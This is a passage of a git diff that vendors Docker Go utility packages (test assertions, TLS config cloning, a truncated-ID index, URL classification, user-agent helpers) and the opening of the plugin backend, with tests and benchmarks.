+ +package windows diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go new file mode 100644 index 0000000000..6da8518a5e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go @@ -0,0 +1,97 @@ +// Package assert contains functions for making assertions in unit tests +package assert + +import ( + "fmt" + "path/filepath" + "reflect" + "runtime" + "strings" + + "github.com/davecgh/go-spew/spew" +) + +// TestingT is an interface which defines the methods of testing.T that are +// required by this package +type TestingT interface { + Fatalf(string, ...interface{}) +} + +// Equal compare the actual value to the expected value and fails the test if +// they are not equal. +func Equal(t TestingT, actual, expected interface{}) { + if expected != actual { + fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual) + } +} + +//EqualStringSlice compares two slices and fails the test if they do not contain +// the same items. +func EqualStringSlice(t TestingT, actual, expected []string) { + if len(actual) != len(expected) { + fatal(t, "Expected (length %d): %q\nActual (length %d): %q", + len(expected), expected, len(actual), actual) + } + for i, item := range actual { + if item != expected[i] { + fatal(t, "Slices differ at element %d, expected %q got %q", + i, expected[i], item) + } + } +} + +// NilError asserts that the error is nil, otherwise it fails the test. +func NilError(t TestingT, err error) { + if err != nil { + fatal(t, "Expected no error, got: %s", err.Error()) + } +} + +// DeepEqual compare the actual value to the expected value and fails the test if +// they are not "deeply equal". 
+func DeepEqual(t TestingT, actual, expected interface{}) { + if !reflect.DeepEqual(actual, expected) { + fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n", + expected, spew.Sdump(expected), actual, spew.Sdump(actual)) + } +} + +// Error asserts that error is not nil, and contains the expected text, +// otherwise it fails the test. +func Error(t TestingT, err error, contains string) { + if err == nil { + fatal(t, "Expected an error, but error was nil") + } + + if !strings.Contains(err.Error(), contains) { + fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error()) + } +} + +// Contains asserts that the string contains a substring, otherwise it fails the +// test. +func Contains(t TestingT, actual, contains string) { + if !strings.Contains(actual, contains) { + fatal(t, "Expected '%s' to contain '%s'", actual, contains) + } +} + +// NotNil fails the test if the object is nil +func NotNil(t TestingT, obj interface{}) { + if obj == nil { + fatal(t, "Expected non-nil value.") + } +} + +func fatal(t TestingT, format string, args ...interface{}) { + t.Fatalf(errorSource()+format, args...) 
+} + +// See testing.decorate() +func errorSource() string { + _, filename, line, ok := runtime.Caller(3) + if !ok { + return "" + } + return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line) +} diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go new file mode 100644 index 0000000000..110b2e6a79 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/pkg.go @@ -0,0 +1 @@ +package testutil diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go new file mode 100644 index 0000000000..0e09d99dae --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go @@ -0,0 +1,36 @@ +package tempfile + +import ( + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/testutil/assert" +) + +// TempFile is a temporary file that can be used with unit tests. TempFile +// reduces the boilerplate setup required in each test case by handling +// setup errors. +type TempFile struct { + File *os.File +} + +// NewTempFile returns a new temp file with contents +func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile { + file, err := ioutil.TempFile("", prefix+"-") + assert.NilError(t, err) + + _, err = file.Write([]byte(content)) + assert.NilError(t, err) + file.Close() + return &TempFile{File: file} +} + +// Name returns the filename +func (f *TempFile) Name() string { + return f.File.Name() +} + +// Remove removes the file +func (f *TempFile) Remove() { + os.Remove(f.Name()) +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go new file mode 100644 index 0000000000..e4dec3a5d1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go @@ -0,0 +1,11 @@ +// +build go1.8 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. 
This function is provided for +// compatibility for go1.7 that doesn't include this method in stdlib. +func Clone(c *tls.Config) *tls.Config { + return c.Clone() +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go new file mode 100644 index 0000000000..0b816650ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go @@ -0,0 +1,31 @@ +// +build go1.6,!go1.7 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. This function is provided for +// compatibility for go1.6 that doesn't include this method in stdlib. +func Clone(c *tls.Config) *tls.Config { + return &tls.Config{ + Rand: c.Rand, + Time: c.Time, + Certificates: c.Certificates, + NameToCertificate: c.NameToCertificate, + GetCertificate: c.GetCertificate, + RootCAs: c.RootCAs, + NextProtos: c.NextProtos, + ServerName: c.ServerName, + ClientAuth: c.ClientAuth, + ClientCAs: c.ClientCAs, + InsecureSkipVerify: c.InsecureSkipVerify, + CipherSuites: c.CipherSuites, + PreferServerCipherSuites: c.PreferServerCipherSuites, + SessionTicketsDisabled: c.SessionTicketsDisabled, + SessionTicketKey: c.SessionTicketKey, + ClientSessionCache: c.ClientSessionCache, + MinVersion: c.MinVersion, + MaxVersion: c.MaxVersion, + CurvePreferences: c.CurvePreferences, + } +} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go new file mode 100644 index 0000000000..0d5b448fec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go @@ -0,0 +1,33 @@ +// +build go1.7,!go1.8 + +package tlsconfig + +import "crypto/tls" + +// Clone returns a clone of tls.Config. This function is provided for +// compatibility for go1.7 that doesn't include this method in stdlib. 
+func Clone(c *tls.Config) *tls.Config { + return &tls.Config{ + Rand: c.Rand, + Time: c.Time, + Certificates: c.Certificates, + NameToCertificate: c.NameToCertificate, + GetCertificate: c.GetCertificate, + RootCAs: c.RootCAs, + NextProtos: c.NextProtos, + ServerName: c.ServerName, + ClientAuth: c.ClientAuth, + ClientCAs: c.ClientCAs, + InsecureSkipVerify: c.InsecureSkipVerify, + CipherSuites: c.CipherSuites, + PreferServerCipherSuites: c.PreferServerCipherSuites, + SessionTicketsDisabled: c.SessionTicketsDisabled, + SessionTicketKey: c.SessionTicketKey, + ClientSessionCache: c.ClientSessionCache, + MinVersion: c.MinVersion, + MaxVersion: c.MaxVersion, + CurvePreferences: c.CurvePreferences, + DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, + Renegotiation: c.Renegotiation, + } +} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go new file mode 100644 index 0000000000..02610b8b7e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go @@ -0,0 +1,137 @@ +// Package truncindex provides a general 'index tree', used by Docker +// in order to be able to reference containers by only a few unambiguous +// characters of their id. +package truncindex + +import ( + "errors" + "fmt" + "strings" + "sync" + + "github.com/tchap/go-patricia/patricia" +) + +var ( + // ErrEmptyPrefix is an error returned if the prefix was empty. + ErrEmptyPrefix = errors.New("Prefix can't be empty") + + // ErrIllegalChar is returned when a space is in the ID + ErrIllegalChar = errors.New("illegal character: ' '") + + // ErrNotExist is returned when ID or its prefix not found in index. + ErrNotExist = errors.New("ID does not exist") +) + +// ErrAmbiguousPrefix is returned if the prefix was ambiguous +// (multiple ids for the prefix). 
+type ErrAmbiguousPrefix struct { + prefix string +} + +func (e ErrAmbiguousPrefix) Error() string { + return fmt.Sprintf("Multiple IDs found with provided prefix: %s", e.prefix) +} + +// TruncIndex allows the retrieval of string identifiers by any of their unique prefixes. +// This is used to retrieve image and container IDs by more convenient shorthand prefixes. +type TruncIndex struct { + sync.RWMutex + trie *patricia.Trie + ids map[string]struct{} +} + +// NewTruncIndex creates a new TruncIndex and initializes with a list of IDs. +func NewTruncIndex(ids []string) (idx *TruncIndex) { + idx = &TruncIndex{ + ids: make(map[string]struct{}), + + // Change patricia max prefix per node length, + // because our len(ID) always 64 + trie: patricia.NewTrie(patricia.MaxPrefixPerNode(64)), + } + for _, id := range ids { + idx.addID(id) + } + return +} + +func (idx *TruncIndex) addID(id string) error { + if strings.Contains(id, " ") { + return ErrIllegalChar + } + if id == "" { + return ErrEmptyPrefix + } + if _, exists := idx.ids[id]; exists { + return fmt.Errorf("id already exists: '%s'", id) + } + idx.ids[id] = struct{}{} + if inserted := idx.trie.Insert(patricia.Prefix(id), struct{}{}); !inserted { + return fmt.Errorf("failed to insert id: %s", id) + } + return nil +} + +// Add adds a new ID to the TruncIndex. +func (idx *TruncIndex) Add(id string) error { + idx.Lock() + defer idx.Unlock() + if err := idx.addID(id); err != nil { + return err + } + return nil +} + +// Delete removes an ID from the TruncIndex. If there are multiple IDs +// with the given prefix, an error is thrown. +func (idx *TruncIndex) Delete(id string) error { + idx.Lock() + defer idx.Unlock() + if _, exists := idx.ids[id]; !exists || id == "" { + return fmt.Errorf("no such id: '%s'", id) + } + delete(idx.ids, id) + if deleted := idx.trie.Delete(patricia.Prefix(id)); !deleted { + return fmt.Errorf("no such id: '%s'", id) + } + return nil +} + +// Get retrieves an ID from the TruncIndex. 
If there are multiple IDs +// with the given prefix, an error is thrown. +func (idx *TruncIndex) Get(s string) (string, error) { + if s == "" { + return "", ErrEmptyPrefix + } + var ( + id string + ) + subTreeVisitFunc := func(prefix patricia.Prefix, item patricia.Item) error { + if id != "" { + // we haven't found the ID if there are two or more IDs + id = "" + return ErrAmbiguousPrefix{prefix: string(prefix)} + } + id = string(prefix) + return nil + } + + idx.RLock() + defer idx.RUnlock() + if err := idx.trie.VisitSubtree(patricia.Prefix(s), subTreeVisitFunc); err != nil { + return "", err + } + if id != "" { + return id, nil + } + return "", ErrNotExist +} + +// Iterate iterates over all stored IDs, and passes each of them to the given handler. +func (idx *TruncIndex) Iterate(handler func(id string)) { + idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error { + handler(string(prefix)) + return nil + }) +} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go new file mode 100644 index 0000000000..8197baf7d4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go @@ -0,0 +1,429 @@ +package truncindex + +import ( + "math/rand" + "testing" + + "github.com/docker/docker/pkg/stringid" +) + +// Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix. 
+func TestTruncIndex(t *testing.T) { + ids := []string{} + index := NewTruncIndex(ids) + // Get on an empty index + if _, err := index.Get("foobar"); err == nil { + t.Fatal("Get on an empty index should return an error") + } + + // Spaces should be illegal in an id + if err := index.Add("I have a space"); err == nil { + t.Fatalf("Adding an id with ' ' should return an error") + } + + id := "99b36c2c326ccc11e726eee6ee78a0baf166ef96" + // Add an id + if err := index.Add(id); err != nil { + t.Fatal(err) + } + + // Add an empty id (should fail) + if err := index.Add(""); err == nil { + t.Fatalf("Adding an empty id should return an error") + } + + // Get a non-existing id + assertIndexGet(t, index, "abracadabra", "", true) + // Get an empty id + assertIndexGet(t, index, "", "", true) + // Get the exact id + assertIndexGet(t, index, id, id, false) + // The first letter should match + assertIndexGet(t, index, id[:1], id, false) + // The first half should match + assertIndexGet(t, index, id[:len(id)/2], id, false) + // The second half should NOT match + assertIndexGet(t, index, id[len(id)/2:], "", true) + + id2 := id[:6] + "blabla" + // Add an id + if err := index.Add(id2); err != nil { + t.Fatal(err) + } + // Both exact IDs should work + assertIndexGet(t, index, id, id, false) + assertIndexGet(t, index, id2, id2, false) + + // 6 characters or less should conflict + assertIndexGet(t, index, id[:6], "", true) + assertIndexGet(t, index, id[:4], "", true) + assertIndexGet(t, index, id[:1], "", true) + + // An ambiguous id prefix should return an error + if _, err := index.Get(id[:4]); err == nil { + t.Fatal("An ambiguous id prefix should return an error") + } + + // 7 characters should NOT conflict + assertIndexGet(t, index, id[:7], id, false) + assertIndexGet(t, index, id2[:7], id2, false) + + // Deleting a non-existing id should return an error + if err := index.Delete("non-existing"); err == nil { + t.Fatalf("Deleting a non-existing id should return an error") + } + + // 
Deleting an empty id should return an error + if err := index.Delete(""); err == nil { + t.Fatal("Deleting an empty id should return an error") + } + + // Deleting id2 should remove conflicts + if err := index.Delete(id2); err != nil { + t.Fatal(err) + } + // id2 should no longer work + assertIndexGet(t, index, id2, "", true) + assertIndexGet(t, index, id2[:7], "", true) + assertIndexGet(t, index, id2[:11], "", true) + + // conflicts between id and id2 should be gone + assertIndexGet(t, index, id[:6], id, false) + assertIndexGet(t, index, id[:4], id, false) + assertIndexGet(t, index, id[:1], id, false) + + // non-conflicting substrings should still not conflict + assertIndexGet(t, index, id[:7], id, false) + assertIndexGet(t, index, id[:15], id, false) + assertIndexGet(t, index, id, id, false) + + assertIndexIterate(t) +} + +func assertIndexIterate(t *testing.T) { + ids := []string{ + "19b36c2c326ccc11e726eee6ee78a0baf166ef96", + "28b36c2c326ccc11e726eee6ee78a0baf166ef96", + "37b36c2c326ccc11e726eee6ee78a0baf166ef96", + "46b36c2c326ccc11e726eee6ee78a0baf166ef96", + } + + index := NewTruncIndex(ids) + + index.Iterate(func(targetId string) { + for _, id := range ids { + if targetId == id { + return + } + } + + t.Fatalf("An unknown ID '%s'", targetId) + }) +} + +func assertIndexGet(t *testing.T, index *TruncIndex, input, expectedResult string, expectError bool) { + if result, err := index.Get(input); err != nil && !expectError { + t.Fatalf("Unexpected error getting '%s': %s", input, err) + } else if err == nil && expectError { + t.Fatalf("Getting '%s' should return an error, not '%s'", input, result) + } else if result != expectedResult { + t.Fatalf("Getting '%s' returned '%s' instead of '%s'", input, result, expectedResult) + } +} + +func BenchmarkTruncIndexAdd100(b *testing.B) { + var testSet []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := 
NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexAdd250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexAdd500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexGet100(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexGet250(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexGet500(b *testing.B) { + var testSet []string + var 
testKeys []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexDelete100(b *testing.B) { + var testSet []string + for i := 0; i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexDelete250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexDelete500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + b.StartTimer() + for _, id := range testSet { + if err := index.Delete(id); err != nil { + b.Fatal(err) + } + } + } +} + +func BenchmarkTruncIndexNew100(b *testing.B) { + var testSet []string + for i := 0; 
i < 100; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexNew250(b *testing.B) { + var testSet []string + for i := 0; i < 250; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexNew500(b *testing.B) { + var testSet []string + for i := 0; i < 500; i++ { + testSet = append(testSet, stringid.GenerateNonCryptoID()) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + NewTruncIndex(testSet) + } +} + +func BenchmarkTruncIndexAddGet100(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexAddGet250(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} + +func BenchmarkTruncIndexAddGet500(b *testing.B) { + var testSet []string + var testKeys []string + for i := 0; i < 500; i++ { + id := stringid.GenerateNonCryptoID() + testSet = append(testSet, id) + l := rand.Intn(12) + 12 + testKeys = 
append(testKeys, id[:l]) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + index := NewTruncIndex([]string{}) + for _, id := range testSet { + if err := index.Add(id); err != nil { + b.Fatal(err) + } + } + for _, id := range testKeys { + if res, err := index.Get(id); err != nil { + b.Fatal(res, err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go new file mode 100644 index 0000000000..44152873b1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go @@ -0,0 +1,50 @@ +// Package urlutil provides helper function to check urls kind. +// It supports http urls, git urls and transport url (tcp://, …) +package urlutil + +import ( + "regexp" + "strings" +) + +var ( + validPrefixes = map[string][]string{ + "url": {"http://", "https://"}, + "git": {"git://", "github.com/", "git@"}, + "transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"}, + } + urlPathWithFragmentSuffix = regexp.MustCompile(".git(?:#.+)?$") +) + +// IsURL returns true if the provided str is an HTTP(S) URL. +func IsURL(str string) bool { + return checkURL(str, "url") +} + +// IsGitURL returns true if the provided str is a git repository URL. +func IsGitURL(str string) bool { + if IsURL(str) && urlPathWithFragmentSuffix.MatchString(str) { + return true + } + return checkURL(str, "git") +} + +// IsGitTransport returns true if the provided str is a git transport by inspecting +// the prefix of the string for known protocols used in git. +func IsGitTransport(str string) bool { + return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") +} + +// IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL. 
+func IsTransportURL(str string) bool { + return checkURL(str, "transport") +} + +func checkURL(str, kind string) bool { + for _, prefix := range validPrefixes[kind] { + if strings.HasPrefix(str, prefix) { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go new file mode 100644 index 0000000000..75eb464fe5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go @@ -0,0 +1,70 @@ +package urlutil + +import "testing" + +var ( + gitUrls = []string{ + "git://github.com/docker/docker", + "git@github.com:docker/docker.git", + "git@bitbucket.org:atlassianlabs/atlassian-docker.git", + "https://github.com/docker/docker.git", + "http://github.com/docker/docker.git", + "http://github.com/docker/docker.git#branch", + "http://github.com/docker/docker.git#:dir", + } + incompleteGitUrls = []string{ + "github.com/docker/docker", + } + invalidGitUrls = []string{ + "http://github.com/docker/docker.git:#branch", + } + transportUrls = []string{ + "tcp://example.com", + "tcp+tls://example.com", + "udp://example.com", + "unix:///example", + "unixgram:///example", + } +) + +func TestValidGitTransport(t *testing.T) { + for _, url := range gitUrls { + if IsGitTransport(url) == false { + t.Fatalf("%q should be detected as valid Git prefix", url) + } + } + + for _, url := range incompleteGitUrls { + if IsGitTransport(url) == true { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} + +func TestIsGIT(t *testing.T) { + for _, url := range gitUrls { + if IsGitURL(url) == false { + t.Fatalf("%q should be detected as valid Git url", url) + } + } + + for _, url := range incompleteGitUrls { + if IsGitURL(url) == false { + t.Fatalf("%q should be detected as valid Git url", url) + } + } + + for _, url := range invalidGitUrls { + if IsGitURL(url) == true { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} + 
+func TestIsTransport(t *testing.T) { + for _, url := range transportUrls { + if IsTransportURL(url) == false { + t.Fatalf("%q should be detected as valid Transport url", url) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/useragent/README.md b/vendor/github.com/docker/docker/pkg/useragent/README.md new file mode 100644 index 0000000000..d9cb367d10 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/README.md @@ -0,0 +1 @@ +This package provides helper functions to pack version information into a single User-Agent header. diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go new file mode 100644 index 0000000000..1137db51b8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go @@ -0,0 +1,55 @@ +// Package useragent provides helper functions to pack +// version information into a single User-Agent header. +package useragent + +import ( + "strings" +) + +// VersionInfo is used to model UserAgent versions. +type VersionInfo struct { + Name string + Version string +} + +func (vi *VersionInfo) isValid() bool { + const stopChars = " \t\r\n/" + name := vi.Name + vers := vi.Version + if len(name) == 0 || strings.ContainsAny(name, stopChars) { + return false + } + if len(vers) == 0 || strings.ContainsAny(vers, stopChars) { + return false + } + return true +} + +// AppendVersions converts versions to a string and appends the string to the string base. +// +// Each VersionInfo will be converted to a string in the format of +// "product/version", where the "product" is get from the name field, while +// version is get from the version field. Several pieces of version information +// will be concatenated and separated by space. +// +// Example: +// AppendVersions("base", VersionInfo{"foo", "1.0"}, VersionInfo{"bar", "2.0"}) +// results in "base foo/1.0 bar/2.0". 
+func AppendVersions(base string, versions ...VersionInfo) string { + if len(versions) == 0 { + return base + } + + verstrs := make([]string, 0, 1+len(versions)) + if len(base) > 0 { + verstrs = append(verstrs, base) + } + + for _, v := range versions { + if !v.isValid() { + continue + } + verstrs = append(verstrs, v.Name+"/"+v.Version) + } + return strings.Join(verstrs, " ") +} diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go new file mode 100644 index 0000000000..0ad7243a6d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go @@ -0,0 +1,31 @@ +package useragent + +import "testing" + +func TestVersionInfo(t *testing.T) { + vi := VersionInfo{"foo", "bar"} + if !vi.isValid() { + t.Fatalf("VersionInfo should be valid") + } + vi = VersionInfo{"", "bar"} + if vi.isValid() { + t.Fatalf("Expected VersionInfo to be invalid") + } + vi = VersionInfo{"foo", ""} + if vi.isValid() { + t.Fatalf("Expected VersionInfo to be invalid") + } +} + +func TestAppendVersions(t *testing.T) { + vis := []VersionInfo{ + {"foo", "1.0"}, + {"bar", "0.1"}, + {"pi", "3.1.4"}, + } + v := AppendVersions("base", vis...) 
+ expect := "base foo/1.0 bar/0.1 pi/3.1.4" + if v != expect { + t.Fatalf("expected %q, got %q", expect, v) + } +} diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go new file mode 100644 index 0000000000..33200d8efa --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_linux.go @@ -0,0 +1,790 @@ +// +build linux + +package plugin + +import ( + "archive/tar" + "compress/gzip" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "os" + "path" + "path/filepath" + "sort" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/distribution" + progressutils "github.com/docker/docker/distribution/utils" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +// Disable deactivates a plugin. This means resources (volumes, networks) cant use them. +func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return err + } + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if !config.ForceDisable && p.GetRefCount() > 0 { + return fmt.Errorf("plugin %s is in use", p.Name()) + } + + if err := pm.disable(p, c); err != nil { + return err + } + pm.config.LogPluginEvent(p.GetID(), refOrID, "disable") + return nil +} + +// Enable activates a plugin, which implies that they are ready to be used by containers. 
+func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) error { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return err + } + + c := &controller{timeoutInSecs: config.Timeout} + if err := pm.enable(p, c, false); err != nil { + return err + } + pm.config.LogPluginEvent(p.GetID(), refOrID, "enable") + return nil +} + +// Inspect examines a plugin config +func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) { + p, err := pm.config.Store.GetV2Plugin(refOrID) + if err != nil { + return nil, err + } + + return &p.PluginObj, nil +} + +func (pm *Manager) pull(ctx context.Context, ref reference.Named, config *distribution.ImagePullConfig, outStream io.Writer) error { + if outStream != nil { + // Include a buffer so that slow client connections don't affect + // transfer performance. + progressChan := make(chan progress.Progress, 100) + + writesDone := make(chan struct{}) + + defer func() { + close(progressChan) + <-writesDone + }() + + var cancelFunc context.CancelFunc + ctx, cancelFunc = context.WithCancel(ctx) + + go func() { + progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan) + close(writesDone) + }() + + config.ProgressOutput = progress.ChanOutput(progressChan) + } else { + config.ProgressOutput = progress.DiscardOutput() + } + return distribution.Pull(ctx, ref, config) +} + +type tempConfigStore struct { + config []byte + configDigest digest.Digest +} + +func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) { + dgst := digest.FromBytes(c) + + s.config = c + s.configDigest = dgst + + return dgst, nil +} + +func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) { + if d != s.configDigest { + return nil, digest.ErrDigestNotFound + } + return s.config, nil +} + +func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} + +func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { + var privileges 
